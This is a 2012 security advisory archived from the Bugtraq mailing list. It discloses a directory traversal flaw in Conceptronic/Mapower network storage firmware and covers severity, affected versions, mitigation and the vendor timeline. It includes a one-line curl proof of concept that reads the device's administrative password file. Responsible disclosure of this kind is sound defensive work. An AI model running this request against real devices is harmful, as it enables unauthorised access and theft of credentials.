lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201209022104.q82L4xe7015341@sf01web2.securityfocus.com>
Date: Sun, 2 Sep 2012 21:04:59 GMT
From: mattijs@...yon.nl
To: bugtraq@...urityfocus.com
Subject: Security Advisory AA-003: Directory Traversal Vulnerability in
 Conceptronic GrabnGo Network Storage

Security Advisory AA-003: Directory Traversal Vulnerability in Conceptronic Grab’n’Go Network Storage

Severity Rating: High
Discovery Date: July 29, 2012
Vendor Notification: July 30, 2012
Disclosure Date: September 3, 2012

Vulnerability Type=
Directory Traversal

Impact=
- System Access
- Exposure of sensitive information

Severity=
Alcyon rates the severity of this vulnerability as high due to the following properties:
- Ease of exploitation;
- No authentication credentials required;
- No knowledge about individual victims required;
- No interaction with the victim required;
- Number of Internet connected devices found.

Products and firmware versions affected=
- Conceptronic CH3ENAS firmware versions up to and including 3.0.12
- Conceptronic CH3HNAS firmware versions up to and including 2.4.13
- Possibly other rebranded Mapower network storage products

Risk Assessment=
An attacker can read arbitrary files, including the files that stores the administrative password.
This means an attacer could:
- Steal sensitive data stored on the device;
- Leverage the device to drop and/or host malware;
- Abuse the device to send spam through the victim’s Internet connection;
- Use the device as a pivot point to access locally connected systems or launch attacks directed to other systems.

Vulnerability=
The CGI-script that is responsible for showing the device logs is affected by a directory traversal vulnerability that 

allows an attacker to view arbitrary files.

Proof of Concept Exploit=

  curl "http://<victimIP>/cgi-bin/log.cgi?syslog&../../etc/sysconfig/config/webmaster.conf&Conceptronic2009"

Risk Mitigation=
At the time of disclosure no updated firmware version was available.
We recommend that you limit access to the devices's web management UI by utilizing proper packet filtering and/or NAT 

on your router in order to limit network access to your NAS. Although this will not completely eliminate the risk of 

exploitation, it becomes substantially more difficult to leverage a successful attack, because it would involve either 

a compromise of another host on the victim’s local network or a client side attack that overcomes the Same Origin 

Policy restrictions of the victim’s web browser.

Vendor Response=
- 2L/Conceptronic has declared on August 1 that it is not in their power to influence the manufacturer's patching 

process
- Mapower, the manufacturer of the affected products, has contacted us on August 28 for details on reproducing the 

issue on a CH3HNAS
- Mapower has confirmed on August 29 that they succesfully have reproduced the PoC exploit on a CH3HNAS and that they 

are working on a fix

Fixed Versions=
- There is currently no vendor patch available.

=Latest version of this advisory
http://www.alcyon.nl/advisories/aa-003/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ